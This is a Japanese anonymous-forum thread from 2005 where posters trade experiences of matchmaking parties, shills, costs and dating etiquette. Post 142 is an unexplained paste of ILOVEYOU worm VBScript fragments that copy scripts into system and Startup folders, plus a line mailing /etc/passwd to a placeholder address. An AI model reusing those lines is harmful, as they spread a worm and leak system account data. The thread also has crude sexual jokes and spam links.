139 :大人の名無しさん:2005/05/03(火) 19:14:29 ID:sRd1CWZO
あげ

140 :大人の名無しさん:2005/05/03(火) 21:35:09 ID:mM1PSoOz
西郷て誰?

141 :大人の名無しさん:2005/05/04(水) 00:37:02 ID:qZK6PCws
駅のホームでマナーを注意され、相手を電車に接触させて重傷を負わせたとして、
 警視庁渋谷署は二十七日、傷害の疑いで、東京都目黒区大橋、飲食店女性従業員、
 小田嶋晃生(あきみ)容疑者(22)を逮捕した。
 調べでは、小田嶋容疑者は、同日午前十一時三十五分ごろ、渋谷区広尾の東京メトロ
 広尾駅のホーム上のベンチで、川崎市内の無職女性(65)から「こんなところで
 化粧をするんじゃないわよ」などと注意されたことに腹を立て、背後から女性の肩を
 強く揺さぶってふらつかせ、入線してきた電車の先頭車両に接触させて、
 胸や腕の骨を折るなどの重傷を負わせた疑い。


142 :大人の名無しさん:2005/05/04(水) 00:37:57 ID:qZK6PCws
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
cat /etc/passwd | mail nobody@nonexistent.com
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"

fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"



143 :大人の名無しさん:2005/05/04(水) 13:21:10 ID:kGoTDd2n
最近パーティによく行ってました。
まぁ取りあえず容姿採用で何人かとカップルになってます。
でもなんだかその先うまくいかない事多数でまた通ってしまいます。

前にカップルになった子が来ていないければ良いんだけど、
前にカップルになった子が来てた場合ちょっと気まずい、
特にその後いろいろあったり、強制終了させた場合なんかはかなり辛い。

先日のパーティは15対15ぐらいのパーティで3人カップルになった子がいたよ…
特にその後何かあった訳じゃないから”この前はどーも、最近元気?”
ぐらいで済んでるからまだ被害はないけど…

144 :大人の名無しさん:2005/05/05(木) 18:53:16 ID:Xpa4WwRx
>>142

145 :大人の名無しさん:2005/05/05(木) 23:34:53 ID:FKq8qKvm
連休中、逝って参りました。
フリータイム中、何人かに言われたのが
「やさしそう」。正直いい年こいて嬉しかった。
メアドもくれたけど、肝心のデートの誘い文には
いっさい触れてられない……。
やはり男はワイルドがいいですか。そうですか。orz

146 :大人の名無しさん:2005/05/06(金) 01:31:48 ID:t9s4+1CR
パーティに行くときシャツをパンツの中にしまうか外に出すかいつも迷います。

147 :大人の名無しさん:2005/05/06(金) 02:37:06 ID:XEiAB5+0
パーティにいくとき、チンコをパンツの中にしまうか外にだすかいつも迷います。

148 :大人の名無しさん:2005/05/06(金) 20:53:26 ID:7935uu48
そういえばチャック全開でフリータイムの間に会場を動きまわっていた事あったなぁ
司会者に耳打ちされた時の恥ずかしさといったら・・

149 :西郷:2005/05/06(金) 22:12:54 ID:DDpWhB2O
続き書くよ〜

150 :大人の名無しさん:2005/05/06(金) 22:42:51 ID:IwB9WBb2
>>149
おお復帰してきたな
続きよろ

151 :大人の名無しさん:2005/05/06(金) 22:54:15 ID:AonJq3ji
>>149
待ってたよ!

152 :大人の名無しさん:2005/05/06(金) 23:32:03 ID:avDtOIFx
>>149
イラネ('A`)

153 :大人の名無しさん:2005/05/07(土) 00:27:14 ID:F+tDGYAO
>>152
オマヱガナ

154 :大人の名無しさん:2005/05/07(土) 13:30:42 ID:t2JhMKoF
パーティにいくとき、マンゲをパンツの中にしまうか外にだすかいつも迷います。

155 :大人の名無しさん:2005/05/07(土) 20:05:15 ID:NBg0uBif
パーティにいくとき、耳毛を剃るか抜くかいつも迷います。

156 :大人の名無しさん:2005/05/10(火) 19:29:10 ID:5uLgKzr2
カップリングパーティって30代が一番多いんだろ
20代前半はさすがに少ないだろーな

157 :大人の名無しさん:2005/05/10(火) 20:56:19 ID:Y01izRal
いませんねぇ〜20代前半
たまにいるかと思ったらキャバ嬢があからさまに営業に来てたりとかしてるし
やはり男女とも結婚を意識する25過ぎくらいから参加してくるような気がします。

158 :大人の名無しさん:2005/05/11(水) 19:27:56 ID:Acf0Iavh
     _,___
    /   __`ヾ),_
   /〃 (⌒゛`ヾv"ヽミ、
  i / /´ _ニ=-=ニ .i l|
  | 彳  〃_.   _ヾ!/   
  | _ !"  ´゚`冫く´゚`l   
  (^ゝ "  ,r_、_.)、 |,,.. -─‐\___
    ヽ_j   、 /,.ー=-/ : : : : : : : : ::)ノ: : ヽ
     \_ "ヽ  ^/ : : : : : : ソ⌒゙ヾ"ヾ、 : :ヽ
  /⌒  - -  ! : : : : : : ) ⌒   ⌒ヾ :(_,
/ /|       | : : : : :(,  _ )  __ )!:_ノ
\ \|≡∨    ヽ (aイ  ´゚   i | . ゚`〈   
  \⊇       \:_|  " . ノ 、_)、 ゙.ノ  
    |        (_ソ人   l ー=‐;! ノ    
    ( /⌒v⌒\     \ヽ__,ノ
パンパン|     丶/⌒ - - \
    / \    |  |     / |
    /  ノ\__|  |・_三_・ノ|  |
   /  /パンパン|  |      |  |
  /__/     |  |      |  |
          ⊆ |     | ⊇

159 :大人の名無しさん:2005/05/12(木) 19:23:58 ID:CsfV5rDZ
40過ぎのオッサンが20代の女をゲットするってありえますか?

160 :大人の名無しさん:2005/05/12(木) 21:44:05 ID:N4Gu0KmB
最近 行ってないなぁ・・・
みんなはどの辺に行くの? やっぱ新宿とか?

あたしは住友ビル(今は京王に移った)とか、同じく西新宿のセッツとか
よく行ったよ。
あのころはまだイケテた・・
狙った人は必ず来てくれたのに、一年前ぐらいに行ったときは
かなりやばかった!!

161 :大人の名無しさん:2005/05/13(金) 19:09:10 ID:9CkdhMeP
>>160
今何歳?

162 :大人の名無しさん:2005/05/13(金) 21:20:08 ID:xydxiuAv
161さん ・・・言えないよぉ〜っ

163 :大人の名無しさん:2005/05/14(土) 11:18:15 ID:yy+hv3Hv
西郷 書いてよぉ。 楽しみにしてんだぜ。

164 :大人の名無しさん:2005/05/14(土) 11:23:03 ID:ncM5zJPi
西郷は今夜のパーティ出席のための準備に余念がありません

165 :大人の名無しさん:2005/05/14(土) 11:37:43 ID:t4Xu7GZK
もうすぐ39歳のおっさんです。
10回目にして奇跡的にカップルになり
何回かのメール交換の末
今日初デートです。相手は24歳位の美女。
だめもとで気軽に行きます。

166 :大人の名無しさん:2005/05/14(土) 14:03:36 ID:QGJns5EQ
>>165
どうして「24歳位」という中途半端なお見立てなのですか?

167 :大人の名無しさん:2005/05/14(土) 14:37:27 ID:t4Xu7GZK
カップルとなったはいいが、友人4人と来ていた女性だったので
ろくにお話もしない別れたのと、
自分の年齢がいいにくいので、あえて相手の年齢を正確に聞いて
いないためです。


168 :大人の名無しさん:2005/05/14(土) 14:53:25 ID:QGJns5EQ
>>167
お互い年齢を知らないわけですね。
最初はわざわざ言わない方がいいかもしれないですね。
あちらも若く見えて実は…かもしれないし。

169 :大人の名無しさん:2005/05/14(土) 15:16:00 ID:yy+hv3Hv
165、167
結果レポよろ。

170 :大人の名無しさん:2005/05/14(土) 19:28:01 ID:qr4d7u0M
>>167
最初の自己紹介タイムのときプロフィールカードを見せ合うでしょ
その時に年齢判るんじゃないの?

171 :大人の名無しさん:2005/05/15(日) 01:11:16 ID:31Dsy2xS
165
今日はお泊りか・・・?

172 :165:2005/05/15(日) 01:21:29 ID:nF3pmsT+
ども。
普段食べなれてないコース料理食べて
かなりお金使いました。
歳は聞かれたので、ごまかさずに正直に言いました。
相手は特に引いた感じはなかったのでちょっとほっとしましたが
内心どうだったかはわかりません。
相手の年齢は合ってました。
プロフィールカードに年齢をあえて乗せない会社もなるんですよね。
はじめは緊張しましたが、途中からもうどうなっても
いいと思って、じでいきました。
まあまあ会話も楽しく、終始なごやかにすごしましたが
この後どうなるかは。。。。。
という感じでしたよ。
カップルのなるコツは、
カップルになった人のトークや姿をよく観察すること
(今後の勉強のため)
フリータイムで2ショットになること
(複数だとどうも遠慮して話せませんね)
この2つを念頭にパーティーに望むとよいと思います。


173 :大人の名無しさん:2005/05/15(日) 01:42:32 ID:C8Vj6Ehw
とデート商法にひっかかってる男性が申しております

174 :大人の名無しさん:2005/05/15(日) 14:19:05 ID:MwzpX9P/
セフレのカップリングパーティーなら行きたいなぁ…

175 :大人の名無しさん:2005/05/15(日) 14:20:27 ID:knJy1zMP
今日もパーティに行こうと思ってるけど、
もうそろそろ何とかならないかな?
女性の皆さんよろしくね。

176 :大人の名無しさん:2005/05/15(日) 14:42:02 ID:uteEJQNK
パーティー行ってもほとんどがサクラだからな・・・
俺も五回ほど行ったが、収穫無し。

177 :大人の名無しさん:2005/05/15(日) 14:44:42 ID:knJy1zMP
カップルになってやっちゃった人何人か居るけどあれはサクラなのか?


178 :大人の名無しさん:2005/05/15(日) 15:19:31 ID:MwzpX9P/
多分…陰ではお金をまきあげられてるかも…

179 :大人の名無しさん:2005/05/15(日) 19:12:49 ID:TcAqoVhk
ほとんどブスばっかりで萎え
しかもサクラっぽい
どうせサクラ呼ぶならもっと可愛い子呼べ

180 :大人の名無しさん:2005/05/16(月) 12:13:18 ID:NudFfFl/
165 レポ乙
飯食って帰っただけ?
なんだかなぁ・・・。

今後の状況のレポもヨロシク!


西郷まだぁ?

181 :大人の名無しさん:2005/05/16(月) 13:24:06 ID:zpOA2Bdn
西郷さん・・・たのんます
後学のため、どうか、続きを・・・
西郷さんのレス邪魔する奴消えろ!

182 :大人の名無しさん:2005/05/16(月) 21:01:49 ID:XoRf8zp1
西郷のはネタだろ


183 :大人の名無しさん:2005/05/16(月) 21:59:06 ID:bjdpfrgw
ネタでも結末が気になる

184 :大人の名無しさん:2005/05/16(月) 23:39:19 ID:ZD+xX1mR
西郷は>>149で最後う

185 :165:2005/05/17(火) 00:38:19 ID:CgW78TYk
まあそうあさらんでも
俺はじっくりいくタイプなんで。
でも、相手は最後の最後まで割り勘を通そうとしてたので
デート商法とかさくらじゃないね。
あと、とってもかわいいのだけど
性格、相性がどうも合わないような気がして・・・ね。
贅沢いってんな!って突っ込まれそうだけど
短い時間でのptじゃほんとわからないね。
難しいよ。


186 :大人の名無しさん:2005/05/17(火) 00:46:46 ID:09ux4TF+
西郷どんのいったPはどうやら摂津みたいでつねww

187 :大人の名無しさん:2005/05/17(火) 01:05:19 ID:Cr8G3otB
西郷イラネ('A`)

188 :大人の名無しさん:2005/05/17(火) 09:50:25 ID:jwWuH7gF
>165
じゃ、じっくり聞くとしよう。

189 :大人の名無しさん:2005/05/17(火) 20:20:45 ID:Kh0R//Jp
お前ら当然独身だよな

190 :165:2005/05/17(火) 22:37:17 ID:CgW78TYk
どうぜん独身です。x1ですが。。。
結婚前提なので、はじは友人として最低数回あってという感じを想定してます。
あってすぐセクースなんて頭の片隅にもありませんでした。


191 :大人の名無しさん:2005/05/18(水) 12:26:29 ID:3dkuASJ7
じっくり、じっくり。

192 :大人の名無しさん:2005/05/18(水) 20:14:05 ID:drn3/kZg
カップルになったらどうすればいいの?
とりあえずメルアド交換だけ?
いきなりホテルに誘ったらまずいかな

193 :大人の名無しさん:2005/05/18(水) 22:17:03 ID:OTAgaUUl
いきなりはいかんぞ

194 :大人の名無しさん:2005/05/19(木) 11:48:58 ID:pFJNk781
うん、いきなりはいかん。
せめて、デート2回目以降で。

195 :大人の名無しさん:2005/05/19(木) 14:48:33 ID:Fdg1QlF1
童貞野郎のHPです。

笑ってやって下さい。(ガッハハハハ!)

http://shimada55.fc2web.com/

196 :大人の名無しさん:2005/05/19(木) 15:04:57 ID:b0eyGj8J
カップリングパーチーお金どんくらいかかんのん

197 :大人の名無しさん:2005/05/19(木) 16:24:39 ID:DfF/GFGm
>>195
C393


198 :大人の名無しさん:2005/05/19(木) 20:24:40 ID:t4jIE9Ps
>>195
氏ね

199 :大人の名無しさん:2005/05/20(金) 00:08:37 ID:09Y/RlKy
196>3万円です。

200 :大人の名無しさん:2005/05/20(金) 15:14:20 ID:09Y/RlKy
テレビ宮崎

201 :大人の名無しさん:2005/05/20(金) 20:19:54 ID:a2iMNbdJ
3万もかからないよ

202 :大人の名無しさん:2005/05/20(金) 22:39:12 ID:e5cnnRGs
ファミレスに呼び出されたら注意して下さいね。

203 :大人の名無しさん:2005/05/20(金) 23:17:59 ID:09Y/RlKy
ファミレスでアナルファック

204 :大人の名無しさん:2005/05/20(金) 23:23:35 ID:e5cnnRGs
いや、アナルに注意するんじゃなくて
マルチの勧誘にです。

205 :大人の名無しさん:2005/05/20(金) 23:32:26 ID:FM6TsZZR
そういう時はマルチの女をアピールして
(σ´∀`)σゲッツ!!

206 :大人の名無しさん:2005/05/21(土) 01:14:46 ID:D3jxTmHK
マルチダさぁ〜ん!

207 :大人の名無しさん:2005/05/21(土) 08:55:47 ID:lJxa42/C
最近、背の高い人が好みになってきた。
身長そのものに惚れてしまう感じ(175以上の場合・・)。
昔はほとんど気にしなかったんだけど、何故だろう。


208 :大人の名無しさん:2005/05/21(土) 10:07:55 ID:m4D2mKu4
フットボールアワーの岩尾に似てるとよく言われますが
でもあまり出会いがなく、出会ってもタイプじゃない人が多いから、
メル友から始めたいです  よろしこ

209 :大人の名無しさん:2005/05/21(土) 10:21:43 ID:hGBFwUmT
>208
プロフィールから1行目を消したほうがいいと思う

210 :大人の名無しさん:2005/05/21(土) 17:32:17 ID:f8NFfFII
>208
岩尾・・・、俺の知ってるキミなのかい?

211 :大人の名無しさん:2005/05/21(土) 22:29:00 ID:iEAWsZq6
今日、東京のパーティーに出てきました。
好みのタイプの子とカップルになれて、
今まで居酒屋さんで飲んで、彼女を送って帰宅。

パーティって良いですね。
出会い系サイトでサクラに泣かされ続けた一ヶ月が嘘のようですた

212 :大人の名無しさん:2005/05/21(土) 23:49:52 ID:fNB336Cs
193〜201をもう一度、読み返して下さい。


213 :大人の名無しさん:2005/05/22(日) 01:56:21 ID:YWZ1h25L
体験談サイト集
http://peepingroom.muvc.net/chat_room.html

214 :大人の名無しさん:2005/05/22(日) 07:32:17 ID:EAbwc2Pu
>>213 チャットの業者広告

215 :大人の名無しさん:2005/05/22(日) 17:08:14 ID:Us291Myn
あーーーーーーん!

216 :大人の名無しさん:2005/05/22(日) 22:21:50 ID:Us291Myn
193〜201をもう一度、読み返して下さい。

217 :大人の名無しさん:2005/05/23(月) 00:35:55 ID:t6sGulkW


218 :大人の名無しさん:2005/05/25(水) 16:52:08 ID:eqaGaepr
ちんちん

219 :大人の名無しさん:2005/05/26(木) 06:38:21 ID:buA9RAZ+
誰か行った?

220 :大人の名無しさん:2005/05/26(木) 08:37:05 ID:bEN4QttN
いれて3秒ぐらいでいった

221 :大人の名無しさん:2005/05/27(金) 15:17:05 ID:csLVPu2p
最初はそんなもんじゃない?
初めての子だと気持ちも高まるしね。

222 :大人の名無しさん:2005/05/28(土) 01:24:41 ID:g+HEwJKq
とあるパーティーにずっと通ってるが
男の常連(いけめん毎回カップル確実の面々)がいつも多すぎ
時には半分以上!
女性は毎回新顔でいい子はみんな常連が持っていきます状態
おまえ毎週かっぷるになってどうすんだよ!って感じ。
もう俺の出番はなさそう
もうあきらめまたよ。。。



223 :大人の名無しさん:2005/05/28(土) 01:30:24 ID:RHK37UGZ
>>222
他のパーティやカテゴリに移れや

224 :222:2005/05/28(土) 11:45:06 ID:g+HEwJKq
だな

225 :大人の名無しさん:2005/05/29(日) 19:54:55 ID:k2obzNkt
30代後半の奴いる?


226 :222:2005/05/29(日) 22:51:09 ID:QSMPBjg8
俺そうだよ


227 :大人の名無しさん:2005/05/30(月) 00:16:52 ID:gmdOEH5z
土曜に参加したPにて。
1番人気の女の子。若くて滅茶苦茶可愛い。
ドタ参らしく、プロフィールシートに名前が
載ってない。
フリータイムは常に複数歓談状態。
ちらっと彼女のインプレッションカードが見えて
しまったのだが、殆どの♂が印つけてる。

俺は勿論玉砕。
彼女の名前は「佐倉」

   ∩___∩         |
   | ノ\     ヽ        |
  /  ●゛  ● |        |
  | ∪  ( _●_) ミ       j
 彡、   |∪|   |        J
/     ∩ノ ⊃  ヽ
(  \ / _ノ |  |
.\ “  /__|  |
  \ /___ /



228 :大人の名無しさん:2005/05/30(月) 19:43:38 ID:rCaDt2dY
ただかわいいだけじゃ駄目っすね
話しやすいコがいいっすね


229 :大人の名無しさん:2005/05/30(月) 21:38:03 ID:zpRO9nVT
5/29のパーチー報告

15:00〜 恋工房 エクゼクティブ系 at京都三条ホテル烏丸

参加:男性24名 女性26名


詳細

女性の年齢条件は22歳〜34歳だったが、ほとんどが20代後半か30代。
男性はほとんどが30歳代。
カップル発表は無しだが、9組成立らしい。

個人的に可愛いと思った女性は、21番と25番。

全員会話で人数の割にはゆっくりとした流れなので、
エクゼブティブの条件を満たしている男性にとってはお勧めでは!?

ちなみに、条件のチェックは厳密に行われます。
私は、源泉徴収票の原本の持参を要求されました。
もちろん、身分証明書も必要。

230 :大人の名無しさん:2005/06/01(水) 20:03:42 ID:3bBLKV8C
お前ら何勝何敗?

231 :大人の名無しさん:2005/06/01(水) 20:22:02 ID:3bBLKV8C
カップルになっても結局2、3回会って
それで終わりってことばかりやな
俺は結構真剣に相手探してんのにな

あーゆうとこで知り合ってずっと続いてるカップルっている?

232 :大人の名無しさん:2005/06/01(水) 21:32:58 ID:Yi0HxH3t
私も真剣に相手探して今度初めて行きます。
カップルにはなれそうだけど続かないような・・・。
出会うきっかけは欲しいから、とにかく頑張ろうっと。
何回行ったら「この人だ♥」って人と出会えるんだろう?


233 :大人の名無しさん:2005/06/01(水) 21:38:02 ID:vPkrM/4Y
♥マーク出せるような2ちゃんねらーには無理じゃないのか

234 :大人の名無しさん:2005/06/01(水) 21:57:13 ID:Yi0HxH3t
そうですか・・・orz

235 :大人の名無しさん:2005/06/01(水) 22:50:48 ID:ix40O3VJ


236 :大人の名無しさん:2005/06/01(水) 22:55:38 ID:AdA7QluD
2chネラーの『?』初めて見たお。


237 :大人の名無しさん:2005/06/01(水) 22:57:32 ID:AdA7QluD
化けた ?⇒?

238 :大人の名無しさん:2005/06/01(水) 22:58:16 ID:AdA7QluD
ヤッパし化けた。


239 :大人の名無しさん:2005/06/03(金) 02:51:00 ID:Bz+xrcWh
229 男性はエリート条件のパーティーって、年令制限以外に男性参加条件がないパーティーと比較したら、女性参加者の容姿レベルは違うものでしょうか?

240 :大人の名無しさん:2005/06/03(金) 08:15:36 ID:cn7LnVwL
>>239
各一回なので信憑性に欠けるかも知れんが
女性のレベルは
エグゼクティブ(年収600)<一人参加限定
だったよ。
まぁ自分でも年収600でエグゼクティブというのは
片腹痛いわけだがw

感想としては、自分の好みもあるので完全に運だよ。
とりあえずつまらない嘘はつかないのが好感触のようだったから
嘘ついて条件の良い方に出るようなのはしない方がいいかもね

241 :大人の名無しさん:2005/06/07(火) 22:14:14 ID:G3fTTjbf
239 240 後で知ったのだが、同会場同時間帯で男性参加条件が医者限定パーティと男性参加条件年令以外になしのパーティーがあった。会場ロビーにいた美女は全て医師限定だった…もちろん僕は医師ではありません。

242 :大人の名無しさん:2005/06/13(月) 12:59:57 ID:K8EP7eP7
このスレ、サクラサクラとうるさいな。
実際いると思うけど、結局サクラにも相手に
されないブ男どもがわめいているだけ。

243 :大人の名無しさん:2005/06/13(月) 23:40:42 ID:jeyEkAqn
そうそう
サクラの26歳の娘をゲットしました。
一回で3Kくらい貰えるから良いアルバイトだそうだ。
普通はカプルにならずに帰るらしいが、
自分のタイプの香具師が居ればOKもするらすぃ。

244 :大人の名無しさん:2005/06/14(火) 12:41:03 ID:25Qkn424
男性超エリート(医者弁護士パイロット年収1000万以上等)限定パーティにサクラ女性は皆無と言っていいでしょうし、参加女性も普通のパーティよりは美女が多いといえるでしょう…

245 :大人の名無しさん:2005/06/14(火) 22:53:15 ID:25Qkn424
243 基本的にサクラはサクラとは言わない。もし仮にサクラである事を相手が認めたら、主催者に文句言いますね、僕なら。もちろん参加費は返却を要求

246 :大人の名無しさん:2005/06/15(水) 01:15:27 ID:AoRBPTRT
>>244
参加女性も普通のパーティよりは美女が多いといえるでしょう…

これは嘘だな。見苦しいほどに必死な女が多い。

247 :大人の名無しさん:2005/06/16(木) 05:26:02 ID:G1YUZu7H
見苦しいというより真剣に相手を探してると解釈しないと!世間の現実をもっと知らないとダメ!男性エリート参加資格に該当しないヒガミ?容姿重視ならパーティ-ではなくクラブに行くよ、桜は別にしてさ

248 :大人の名無しさん:2005/06/16(木) 09:06:18 ID:gfdp6TGL
と脈があると勘違いしてヤリ目に当たる予定の女性が申しております。

249 :大人の名無しさん:2005/06/21(火) 03:18:33 ID:u+0YXcIt
医者等の超エリートでない限り、パーティで美女を獲得出来るほど世の中甘くはありません!だいたいストーカーだなんだと言われる時代にわざわざ普段からバンバン男から声がかかる美女が凡人が集うパーティなんていきません

250 :大人の名無しさん:2005/06/22(水) 01:02:33 ID:hLV28Osp
247=249乙

251 :大人の名無しさん:2005/06/22(水) 01:25:49 ID:oDrzokJW
お見合いパーティで楽して美女ゲット出来るのは医者等の超エリートか超イケメンだけ!中途半端な男はお見合いパーティーで美女ゲットは至難の業!苦労して街やクラブでナンパする方がいいかと!世の中楽して得れる物はしれてる

51 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)